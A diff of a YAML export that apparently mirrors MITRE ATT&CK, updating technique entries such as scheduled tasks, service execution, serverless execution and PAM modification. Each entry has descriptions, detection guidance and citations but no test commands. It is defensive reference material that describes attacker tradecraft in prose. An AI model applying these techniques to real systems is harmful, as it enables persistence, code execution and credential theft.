+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26505,7 +26884,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26532,30 +26911,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26572,9 +26933,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26582,21 +26944,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26646,28 +27024,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26678,32 +27039,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26746,12 +27119,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26808,11 +27180,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26877,14 +27248,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26905,14 +27275,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26921,16 +27296,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26956,6 +27333,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26970,29 +27355,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -27005,25 +27371,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -27073,17 +27455,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -27146,7 +27527,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -27180,8 +27561,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -27190,6 +27571,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27202,29 +27587,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27271,7 +27656,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27303,8 +27688,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27318,6 +27703,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27330,16 +27719,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27402,7 +27794,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27467,49 +27858,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27524,20 +27876,57 @@ persistence:
         phase_name: defense-evasion
